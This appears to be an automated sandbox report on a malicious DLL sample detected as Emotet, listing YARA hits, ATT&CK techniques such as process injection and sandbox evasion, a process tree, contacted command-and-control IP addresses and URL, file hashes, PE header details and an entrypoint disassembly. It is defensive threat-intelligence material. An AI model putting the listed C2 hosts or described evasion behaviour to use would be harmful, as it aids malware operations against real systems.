                      Source: Yara matchFile source: 00000007.00000002.1232107048.0000000004F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.714978387.00000000041A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711795712.0000000004040000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711701070.0000000003FC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712440145.0000000004880000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712583531.00000000048E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232396043.00000000056E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232361987.00000000056B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712769808.0000000004A71000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711647577.0000000003F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710385050.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000B92A __EH_prolog3_GS,lstrlenW,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,

Mitre Att&ck Matrix

Cells are tactic columns of the matrix; a number in parentheses is the count of signatures the report attributes to that technique, cells without one were not observed for this sample.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API (1) | Path Interception | Process Injection (112) | Masquerading (2) | Input Capture (2) | System Time Discovery (2) | Remote Services | Input Capture (2) | Exfiltration Over Other Network Medium | Encrypted Channel (11) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion (2) | LSASS Memory | Query Registry (1) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (112) | Security Account Manager | Security Software Discovery (31) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information (1) | NTDS | Virtualization/Sandbox Evasion (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (12) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories (1) | LSA Secrets | Process Discovery (2) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information (2) | Cached Domain Credentials | Application Window Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 (1) | DCSync | Remote System Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion (1) | Proc Filesystem | File and Directory Discovery (2) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery (27) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

Behavior Graph

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 531996
Sample: spZRMihlrkFGqYq1f.dll
Start date: 01/12/2021
Architecture: WINDOWS
Score: 96

Network nodes attached to the sample:
• 85.214.67.203 (STRATOSTRATOAGDE, Germany)
• 195.154.146.35 (OnlineSASFR, France)
• 17 other IPs or domains
• 51.178.61.60, port 443, local port 49775 (OVHFR, France), contacted by the last rundll32.exe in the loaddll32.exe chain

Signatures attached to the sample node:
• Sigma detected: Emotet RunDLL32 Process Creation
• Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
• Found malware configuration
• 3 other signatures

Process tree (process nodes and the signatures attached to them):
• loaddll32.exe
  • rundll32.exe (Hides that the sample has been downloaded from the Internet (zone.identifier))
    • rundll32.exe
      • rundll32.exe (System process connects to network (likely due to code injection or exploit); connects to 51.178.61.60:443)
  • cmd.exe
    • rundll32.exe
      • rundll32.exe
• svchost.exe
• svchost.exe
• 2 other processes

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
spZRMihlrkFGqYq1f.dll | 43% | Metadefender |
spZRMihlrkFGqYq1f.dll | 57% | ReversingLabs | Win32.Trojan.Mansabo

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
3.2.rundll32.exe.4710000.5.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.3fc0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.34d0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.58b0000.11.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.4a70000.11.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.59a0000.13.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.4910000.9.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.5bd0000.17.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.56e0000.7.unpack | 100% | Avira | HEUR/AGEN.1110387
6.2.rundll32.exe.42d0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.4ed0000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.4630000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.5840000.9.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.48b0000.7.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.5600000.5.unpack | 100% | Avira | HEUR/AGEN.1110387
4.2.rundll32.exe.30d0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.5ac0000.15.unpack | 100% | Avira | HEUR/AGEN.1110387

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
https://51.178.61.60/ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ | 0% | Avira URL Cloud | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://51.178.61.60/ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.tiktok.com/legal/report/feedback | svchost.exe, 0000000C.00000003.818284709.000001A77038B000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818383957.000001A770802000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818022632.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818039351.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818344967.000001A770372000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://help.disneyplus.com. | svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://disneyplus.com/legal. | svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                      Contacted IPs

                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
207.148.81.119 | unknown | United States | 20473 | AS-CHOOPAUS | true
196.44.98.190 | unknown | Ghana | 327814 | EcobandGH | true
78.46.73.125 | unknown | Germany | 24940 | HETZNER-ASDE | true
37.59.209.141 | unknown | France | 16276 | OVHFR | true
85.214.67.203 | unknown | Germany | 6724 | STRATOSTRATOAGDE | true
191.252.103.16 | unknown | Brazil | 27715 | LocawebServicosdeInternetSABR | true
45.79.33.48 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
54.37.228.122 | unknown | France | 16276 | OVHFR | true
185.148.169.10 | unknown | Germany | 44780 | EVERSCALE-ASDE | true
142.4.219.173 | unknown | Canada | 16276 | OVHFR | true
54.38.242.185 | unknown | France | 16276 | OVHFR | true
195.154.146.35 | unknown | France | 12876 | OnlineSASFR | true
195.77.239.39 | unknown | Spain | 60493 | FICOSA-ASES | true
78.47.204.80 | unknown | Germany | 24940 | HETZNER-ASDE | true
168.197.250.14 | unknown | Argentina | 264776 | OmarAnselmoRipollTDCNETAR | true
51.178.61.60 | unknown | France | 16276 | OVHFR | true
177.72.80.14 | unknown | Brazil | 262543 | NewLifeFibraBR | true
66.42.57.149 | unknown | United States | 20473 | AS-CHOOPAUS | true
37.44.244.177 | unknown | Germany | 47583 | AS-HOSTINGERLT | true
51.210.242.234 | unknown | France | 16276 | OVHFR | true

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:531996
                      Start date:01.12.2021
                      Start time:16:10:38
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:spZRMihlrkFGqYq1f.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:19
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal96.troj.evad.winDLL@17/0@0/20
                      EGA Information:
                      • Successful, ratio: 80%
                      HDC Information:
                      • Successful, ratio: 99.3% (good quality ratio 91.2%)
                      • Quality average: 75.6%
                      • Quality standard deviation: 29.5%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .dll
                      • Override analysis time to 240s for rundll32
                      Warnings:
                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 20.54.110.249, 40.91.112.76
                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/531996/sample/spZRMihlrkFGqYq1f.dll

                      Simulations

                      Behavior and APIs

Time | Type | Description
16:12:45 | API Interceptor | 7x Sleep call for process: svchost.exe modified

                      Joe Sandbox View / Context

                      IPs

Match | Associated Sample Name / URL | Detection

Match: 207.148.81.119
• gvtdsqavfej.dll (malicious)
• mhOX6jll6x.dll (malicious)
• dguQYT8p8j.dll (malicious)
• jSxIzXfwc7.dll (malicious)
• mhOX6jll6x.dll (malicious)
• X2XCewI2Yy.dll (malicious)
• dguQYT8p8j.dll (malicious)
• HMvjzUYq2h.dll (malicious)
• s9BZBDWmi4.dll (malicious)
• bFx5bZRC6P.dll (malicious)
• c7IUEh66u6.dll (malicious)
• HMvjzUYq2h.dll (malicious)
• s9BZBDWmi4.dll (malicious)
• bFx5bZRC6P.dll (malicious)
• WfCt2B042X.dll (malicious)
• ZKVYER7XcT.dll (malicious)
• 2cq85E4EeM.dll (malicious)
• WfCt2B042X.dll (malicious)
• ZKVYER7XcT.dll (malicious)
• 6PPJENHoVW.dll (malicious)

Match: 196.44.98.190
• gvtdsqavfej.dll (malicious)
• mhOX6jll6x.dll (malicious)
• dguQYT8p8j.dll (malicious)
• jSxIzXfwc7.dll (malicious)
• mhOX6jll6x.dll (malicious)
• X2XCewI2Yy.dll (malicious)
• dguQYT8p8j.dll (malicious)
• HMvjzUYq2h.dll (malicious)
• s9BZBDWmi4.dll (malicious)
• bFx5bZRC6P.dll (malicious)
• c7IUEh66u6.dll (malicious)
• HMvjzUYq2h.dll (malicious)
• s9BZBDWmi4.dll (malicious)
• bFx5bZRC6P.dll (malicious)
• WfCt2B042X.dll (malicious)
• ZKVYER7XcT.dll (malicious)
• 2cq85E4EeM.dll (malicious)
• WfCt2B042X.dll (malicious)
• ZKVYER7XcT.dll (malicious)
• 6PPJENHoVW.dll (malicious)

Domains

No context

ASN

Match | Associated Sample Name / URL | Detection | Context

Match: AS-CHOOPAUS
• iU17wh2uUd.exe (malicious), context: 149.28.253.196
• iU17wh2uUd.exe (malicious), context: 149.28.253.196
• Sz4lxTmH7r.exe (malicious), context: 149.28.253.196
• 7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exe (malicious), context: 149.28.253.196
• RFIlSRQKzj.exe (malicious), context: 45.32.115.235
• setup_x86_x64_install.exe (malicious), context: 149.28.253.196
• 991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exe (malicious), context: 149.28.253.196
• MMUc2aeWxZ.exe (malicious), context: 149.28.253.196
• 0pvsj0MF1D.exe (malicious), context: 149.28.253.196
• Linux_amd64 (malicious), context: 45.32.162.141
• nkXzJnW7AH.exe (malicious), context: 149.28.253.196
• 67MPsax8fd.exe (malicious), context: 136.244.117.138
• Linux_x86 (malicious), context: 45.77.44.252
• uI6mJo4TJQ.exe (malicious), context: 149.28.253.196
• uI6mJo4TJQ.exe (malicious), context: 149.28.253.196
• M2jG6lMe7Y.exe (malicious), context: 202.182.120.6
• 7LPqKhiPCL.exe (malicious), context: 139.180.133.9
• wvYbWkOPqJ.exe (malicious), context: 149.28.253.196
• wvYbWkOPqJ.exe (malicious), context: 149.28.253.196
• 7OoLG7JkFC (malicious), context: 44.40.164.168

Match: EcobandGH
• gvtdsqavfej.dll (malicious), context: 196.44.98.190
• mhOX6jll6x.dll (malicious), context: 196.44.98.190
• dguQYT8p8j.dll (malicious), context: 196.44.98.190
• jSxIzXfwc7.dll (malicious), context: 196.44.98.190
• mhOX6jll6x.dll (malicious), context: 196.44.98.190
• X2XCewI2Yy.dll (malicious), context: 196.44.98.190
• dguQYT8p8j.dll (malicious), context: 196.44.98.190
• HMvjzUYq2h.dll (malicious), context: 196.44.98.190
• s9BZBDWmi4.dll (malicious), context: 196.44.98.190
• bFx5bZRC6P.dll (malicious), context: 196.44.98.190
• c7IUEh66u6.dll (malicious), context: 196.44.98.190
• HMvjzUYq2h.dll (malicious), context: 196.44.98.190
• s9BZBDWmi4.dll (malicious), context: 196.44.98.190
• bFx5bZRC6P.dll (malicious), context: 196.44.98.190
• WfCt2B042X.dll (malicious), context: 196.44.98.190
• ZKVYER7XcT.dll (malicious), context: 196.44.98.190
• 2cq85E4EeM.dll (malicious), context: 196.44.98.190
• WfCt2B042X.dll (malicious), context: 196.44.98.190
• ZKVYER7XcT.dll (malicious), context: 196.44.98.190
• 6PPJENHoVW.dll (malicious), context: 196.44.98.190

JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      51c64c77e60f3980eea90869b68c58a8fehiVK2JSx.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      kQ9HU0gKVH.exeGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      gvtdsqavfej.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      jSxIzXfwc7.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      X2XCewI2Yy.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
                                                                                                      HMvjzUYq2h.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60
s9BZBDWmi4.dll (malicious)
• 51.178.61.60
bFx5bZRC6P.dll (malicious)
• 51.178.61.60
c7IUEh66u6.dll (malicious)
• 51.178.61.60
HMvjzUYq2h.dll (malicious)
• 51.178.61.60
s9BZBDWmi4.dll (malicious)
• 51.178.61.60
bFx5bZRC6P.dll (malicious)
• 51.178.61.60
WfCt2B042X.dll (malicious)
• 51.178.61.60
ZKVYER7XcT.dll (malicious)
• 51.178.61.60
2cq85E4EeM.dll (malicious)
• 51.178.61.60

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.7859159976425
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 95.51%
• InstallShield setup (43055/19) 4.10%
• Generic Win/DOS Executable (2004/3) 0.19%
• DOS Executable Generic (2002/1) 0.19%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: spZRMihlrkFGqYq1f.dll
File size: 712704
MD5: 9f4fa905fd685d28c4ff28f24ad224a1
SHA1: e186e0869276d3af6465d7c754b22527c7ac2ced
SHA256: 808e8247efd685bdbae3ea0e55de1e8ed8aecd1359a213b0c6291b73f007fdaf
SHA512: d8c33eb38fe54e40d463f20b6091c88863f0fadc70382ad826d7c33e61d696af614e9ba8c73f84d4e13fb141289d5bd978451a5565f61e869a054a837fdef5e0
SSDEEP: 12288:WKEUkuAOLka1miSmuYr1V7nAobS3qTHPR101D:TEQLka1nBVDAoS3WvR
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y.V.8...8...8..I7...8..I7...8...8...:.......8.......8......48.......8.......8.......8.......8..Rich.8..........PE..L...(..a...

File Icon

Icon Hash: be71f1aca0b8c0c4

Static PE Info

General

Entrypoint: 0x1003d301
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x10000000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp: 0x61A0C528 [Fri Nov 26 11:29:44 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: d8c52655a835ecb2c6fea489c7c7674b

Entrypoint Preview

Instruction
cmp dword ptr [esp+08h], 01h
jne 00007FF29CC13127h
call 00007FF29CC1ECF7h
push dword ptr [esp+04h]
mov ecx, dword ptr [esp+10h]
mov edx, dword ptr [esp+0Ch]
call 00007FF29CC13012h
pop ecx
retn 000Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+10h]
mov eax, edi
sub eax, 00000000h
je 00007FF29CC1470Bh
dec eax
je 00007FF29CC146F3h
dec eax
je 00007FF29CC146BEh
dec eax
je 00007FF29CC1466Fh
dec eax
je 00007FF29CC145DFh
mov ecx, dword ptr [ebp+0Ch]
mov eax, dword ptr [ebp+08h]
push ebx
push 00000020h
pop edx
jmp 00007FF29CC13597h
mov esi, dword ptr [eax]
cmp esi, dword ptr [ecx]
je 00007FF29CC1319Eh
movzx esi, byte ptr [eax]
movzx ebx, byte ptr [ecx]
sub esi, ebx
je 00007FF29CC13137h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007FF29CC1358Fh
movzx esi, byte ptr [eax+01h]
movzx ebx, byte ptr [ecx+01h]
sub esi, ebx
je 00007FF29CC13137h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007FF29CC1356Eh
movzx esi, byte ptr [eax+02h]
movzx ebx, byte ptr [ecx+02h]
sub esi, ebx
je 00007FF29CC13137h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007FF29CC1354Dh
movzx eax, byte ptr [eax]

Rich Headers

Programming Language:
• [RES] VS2005 build 50727
• [ C ] VS2005 build 50727
• [EXP] VS2005 build 50727
• [C++] VS2005 build 50727
• [ASM] VS2005 build 50727
• [LNK] VS2005 build 50727

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x70890 | 0x4e | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dec8 | 0xf0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9c000 | 0x9af8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa6000 | 0x767c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x63558 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x58000 | 0x7d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x6de40 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x566b7 | 0x57000 | False | 0.574984846444 | data | 6.6363911364 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x58000 | 0x188de | 0x19000 | False | 0.30236328125 | data | 4.88012998463 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x71000 | 0x2a254 | 0x27000 | False | 0.931434044471 | data | 7.84888321435 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x9c000 | 0x9af8 | 0xa000 | False | 0.241723632813 | data | 3.85640321845 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa6000 | 0xbd48 | 0xc000 | False | 0.347106933594 | data | 4.87718770475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x9d780 | 0x134 | data | English | United States
RT_CURSOR | 0x9d8b4 | 0xb4 | data | English | United States
RT_CURSOR | 0x9d968 | 0x134 | data | English | United States
RT_CURSOR | 0x9da9c | 0xb4 | data | English | United States
RT_CURSOR | 0x9db50 | 0x134 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0x9dc84 | 0xb4 | data | English | United States
RT_CURSOR | 0x9dd38 | 0x134 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0x9de6c | 0xb4 | data | English | United States
RT_CURSOR | 0x9df20 | 0x134 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0x9e054 | 0xb4 | data | English | United States
RT_CURSOR | 0x9e108 | 0x200 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0x9e308 | 0xb4 | data | English | United States
RT_CURSOR | 0x9e3bc | 0x200 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0x9e5bc | 0xb4 | data | English | United States
RT_CURSOR | 0x9e670 | 0x200 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0x9e870 | 0xb4 | data | English | United States
RT_CURSOR | 0x9e924 | 0x200 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0x9eb24 | 0xb4 | data | English | United States
RT_CURSOR | 0x9ebd8 | 0x134 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0x9ed0c | 0xb4 | data | English | United States
RT_CURSOR | 0x9edc0 | 0x134 | data | English | United States
RT_CURSOR | 0x9eef4 | 0xb4 | data | English | United States
RT_CURSOR | 0x9efa8 | 0x134 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0x9f0dc | 0x134 | data | English | United States
RT_CURSOR | 0x9f210 | 0x134 | data | English | United States
RT_CURSOR | 0x9f344 | 0x134 | data | English | United States
RT_CURSOR | 0x9f478 | 0x134 | data | English | United States
RT_CURSOR | 0x9f5ac | 0x134 | data | English | United States
RT_CURSOR | 0x9f6e0 | 0x134 | data | English | United States
RT_CURSOR | 0x9f814 | 0x134 | data | English | United States
RT_CURSOR | 0x9f948 | 0x134 | data | English | United States
RT_CURSOR | 0x9fa7c | 0x134 | data | English | United States
RT_CURSOR | 0x9fbb0 | 0x134 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0x9fce4 | 0x134 | data | English | United States
RT_CURSOR | 0x9fe18 | 0x134 | data | English | United States
RT_CURSOR | 0x9ff4c | 0x134 | data | English | United States
RT_CURSOR | 0xa0080 | 0x134 | data | English | United States
RT_CURSOR | 0xa01b4 | 0xb4 | data | English | United States
RT_BITMAP | 0xa0268 | 0x4a0 | data | English | United States
RT_BITMAP | 0xa0708 | 0x2c0 | data | English | United States
RT_BITMAP | 0xa09c8 | 0xb8 | data | English | United States
RT_BITMAP | 0xa0a80 | 0x144 | data | English | United States
RT_ICON | 0xa0bc4 | 0x2e8 | data | English | United States
RT_ICON | 0xa0eac | 0x2e8 | data | English | United States
RT_MENU | 0xa1194 | 0x15c | data | English | United States
